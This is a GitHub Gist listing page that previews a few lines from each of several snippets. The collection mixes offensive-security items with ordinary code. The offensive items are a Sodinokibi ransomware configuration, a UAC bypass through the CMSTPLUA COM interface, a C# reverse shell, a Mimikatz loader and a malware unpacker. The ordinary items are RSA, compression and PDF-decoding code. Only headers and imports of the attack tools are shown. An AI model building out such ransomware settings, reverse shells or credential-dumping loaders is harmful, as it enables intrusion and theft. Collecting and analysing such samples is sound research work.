Skip to content

Instantly share code, notes, and snippets.

@Voraka
Voraka / config.json
Created October 18, 2019 05:38
Sodinokibi ransomware (Sample: 1ce1ca85bff4517a1ef7e8f9a7c22b16)
{
"pk":"1g3/QEQPOQ7S3fBLZ0wvu/B9NfpLLvf8mByoN3or9E0=",
"pid":"5",
"sub":"367",
"dbg":false,
"fast":true,
"wipe":true,
"wht":{
"fld":[
"windows",
@Voraka
Voraka / simple-port-multiplier.py
Created July 22, 2019 05:52 — forked from WangYihang/simple-port-multiplier.py
A Simple Port Multiplier.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# a Tcp Port Forwarding and a Port Multiplier (HTTP/SSH)
# Author : WangYihang <wangyihanger@gmail.com>
import socket
import threading
import sys
@Voraka
Voraka / akagi_41.c
Created July 9, 2019 08:05 — forked from hfiref0x/akagi_41.c
UAC bypass using CMSTPLUA COM interface
typedef interface ICMLuaUtil ICMLuaUtil;
typedef struct ICMLuaUtilVtbl {
BEGIN_INTERFACE
HRESULT(STDMETHODCALLTYPE *QueryInterface)(
__RPC__in ICMLuaUtil * This,
__RPC__in REFIID riid,
_COM_Outptr_ void **ppvObject);
@Voraka
Voraka / rsa.py
Created June 14, 2019 09:03 — forked from soachishti/rsa.py
A simple RSA implementation in Python
'''
620031587
Net-Centric Computing Assignment
Part A - RSA Encryption
'''
import random
'''
@Voraka
Voraka / Qompress.cs
Created June 12, 2019 08:37 — forked from markandey/Qompress.cs
Simple Compress and Decompress in C#.net
using System.IO;
using System.IO.Compression;
class Qompress
{
public static byte[] CompressBuffer(byte[] byteArray)
{
MemoryStream strm = new MemoryStream();
@Voraka
Voraka / Simple_Rev_Shell.cs
Created May 27, 2019 15:27 — forked from BankSecurity/Simple_Rev_Shell.cs
C# Simple Reverse Shell Code
using System;
using System.Text;
using System.IO;
using System.Diagnostics;
using System.ComponentModel;
using System.Linq;
using System.Net;
using System.Net.Sockets;
@Voraka
Voraka / pdf_flatedecode.py
Created August 28, 2018 07:58 — forked from averagesecurityguy/pdf_flatedecode.py
Decompress FlateDecode Objects in PDF
#!/bin/bash
import re
import zlib
pdf = open("some_doc.pdf", "rb").read()
stream = re.compile(r'.*?FlateDecode.*?stream(.*?)endstream', re.S)
for s in stream.findall(pdf):
s = s.strip('\r\n')
try:
@Voraka
Voraka / http.py
Created July 13, 2018 02:58 — forked from R1ngK3y/http.py
# -*- coding: UTF-8 -*-
import socket
import threading, getopt, sys, string
import re
#设置默认的最大连接数和端口号
list=50
port=80
@Voraka
Voraka / katz.cs
Created July 13, 2018 02:41 — forked from nicholasmckinney/katz.cs
.NET 2.0.50727 Mimikatz Extract and Execute -
This file has been truncated, but you can view the full file.
using System;
using System.IO;
using System.Text;
using System.IO.Compression;
using System.EnterpriseServices;
using System.Collections.Generic;
using System.Configuration.Install;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
@Voraka
Voraka / unpack.cpp
Created June 27, 2018 08:36 — forked from hasherezade/unpack.cpp
LibPeConv-based unpacker for sample: bd47776c0d1dae57c0c3e5e2832f13870a38d5fd
#include <stdio.h>
#include <windows.h>
#include "peconv.h"
// for the sample: bd47776c0d1dae57c0c3e5e2832f13870a38d5fd
// from: "Unpacking Pykspa Malware With Python and IDA Pro - Subscriber Request Part 1"
// https://www.youtube.com/watch?v=HfSQlC76_s4
int (__cdecl *unpack_func)(BYTE* blob, DWORD blob_size, LPCSTR lpFileName, char r_val) = nullptr;